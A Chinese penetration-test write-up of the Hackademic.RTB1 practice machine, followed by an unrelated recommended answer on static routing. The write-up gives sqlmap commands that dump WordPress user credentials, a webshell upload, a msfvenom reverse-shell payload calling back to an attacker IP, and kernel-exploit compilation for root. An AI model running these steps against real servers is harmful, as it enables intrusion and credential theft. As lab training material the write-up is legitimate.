Hackademic.RTB1-渗透报告

2023年1030

6:34

一、渗透测试目的

找出目标服务器存在的脆弱性、威胁面、影响范围等多维度的安全问题,为服务器和网站的后续加固提供思路。

本次的测试对象为:Hackademic.RTB1

测试环境:kali、Linux

二、摘要

找出服务器存在的安全隐患,和服务器管理员的相关人员的不安全行为,因此本次渗透流程采用黑盒测试。本次渗透过程中发现目标存在sql注入漏洞,敏感信息泄露,用户权限过高等问题。建议将网站的后台界面做有效的安全性处理,对用户的访问权限做有效的限制,对接受的参数做有效的安全性校验和过滤。

三、测试结果

网站存在sql注入、敏感信息泄露、

四、测试流程

端口扫描

目录扫描

敏感目录泄露的

sql注入利用

http://192.168.190.165/Hackademic_RTB1/?cat=1

利用sqlmap拿到数据库信息

sqlmap -u "http://192.168.190.165/Hackademic_RTB1/?cat=1" -dbs

sqlmap -u "http://192.168.190.165/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns

sqlmap -u http://192.168.6.143/Hackademic_RTB1/?cat=1 -C user_login,user_pass -D wordpress -T wp_users --dump --batch --column --batch

拿到用户名和密码

结合目录中的敏感目录得到后台登录页面

利用刚刚得到的用户名密码进行登录

发现GeorgeMiller拥有更高的权限

http://192.168.190.165/Hackademic_RTB1/wp-admin/options-misc.php在这里修改允许文件上传和文件上传的类型,造成任意文件上传

上传木马getshell

上传成功利用webshell管理工具进行连接

使用哥斯拉连接getshell192.168.190.165/Hackademic_RTB1/wp-content/gzl.php

利用kali生成的木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.190.164 LPORT=9999 -f elf -o shell.elf

利用内核存在的漏洞

使用msf进行提权

use exploit/multi/handler

Set payload

Set  lhost

Set lport

Run

Shell

将利用哥斯拉上传的exp文件编译(这里一定要进入shell模式不然无法编译成功)

Gcc -o exp 15285.c

exp但是这里需要具有执行权限

然后就可以提取成功了,根据首页的提示拿到flag

敏感信息泄露

五、修复建议

减低敏感目录权限,对url接受的参数加上有效的校验和过滤,固定文件上传的类型

六、总结

这个靶机主要是利用泄露的敏感目录,然后访问到后台页面,通过注入漏洞拿到后台管理员的密码,从而造成服务器权限的丢失。同时后台对上传的文件校验并不严谨,网页用户可以具有执行权限,使得服务器的最高权限丢失。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
好的,我明白了你的问题。首先,我会给你简单介绍一下静态路由。静态路由是一种手动配置路由表的方法,管理员需要手动将网络目的地址与下一跳路由器的地址添加到路由表中,以确定数据包的下一跳。现在,我会根据你的要求来配置路由器。 首先,我们需要将PC1和PC4所在的网络地址添加到路由器的路由表中。我会假设PC1的IP地址为192.168.1.1,PC4的IP地址为192.168.2.1。然后,我们需要为路由器的各个接口分配IP地址。我会假设RTA的接口连接PC1的IP地址为192.168.1.254,连接RTC的IP地址为10.0.12.1;RTC的接口连接RTA的IP地址为10.0.12.2,连接RTD的IP地址为10.0.24.1;RTD的接口连接RTC的IP地址为10.0.24.2,连接PC4的IP地址为192.168.2.254;RTB的接口连接PC4的IP地址为192.168.2.253,连接RTA的IP地址为10.0.13.2。 在RTA上添加路由表项: ``` ip route 192.168.2.0 255.255.255.0 10.0.12.1 ``` 在RTB上添加路由表项: ``` ip route 192.168.1.0 255.255.255.0 10.0.13.1 ``` 在RTC上添加路由表项: ``` ip route 192.168.2.0 255.255.255.0 10.0.24.2 ip route 192.168.1.0 255.255.255.0 10.0.12.2 ``` 在RTD上添加路由表项: ``` ip route 192.168.1.0 255.255.255.0 10.0.24.1 ``` 配置完成后,我们可以使用Tracert命令测试流量路径。首先,我们在PC1上运行Tracert命令: ``` tracert 192.168.2.1 ``` 结果应该为: ``` 1 <1 ms <1 ms <1 ms 192.168.1.254 2 1 ms 1 ms 1 ms 10.0.12.1 3 2 ms 2 ms 2 ms 10.0.24.2 4 <1 ms <1 ms <1 ms 192.168.2.254 5 <1 ms <1 ms <1 ms 192.168.2.1 ``` 然后,我们在PC4上运行Tracert命令: ``` tracert 192.168.1.1 ``` 结果应该为: ``` 1 <1 ms <1 ms <1 ms 192.168.2.253 2 1 ms 1 ms 1 ms 10.0.13.2 3 2 ms 2 ms 2 ms 10.0.12.2 4 <1 ms <1 ms <1 ms 192.168.1.254 5 <1 ms <1 ms <1 ms 192.168.1.1 ``` 这样,我们就成功地使用静态路由实现了PC1和PC4之间的互相通信,并且满足了你的流量路径要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值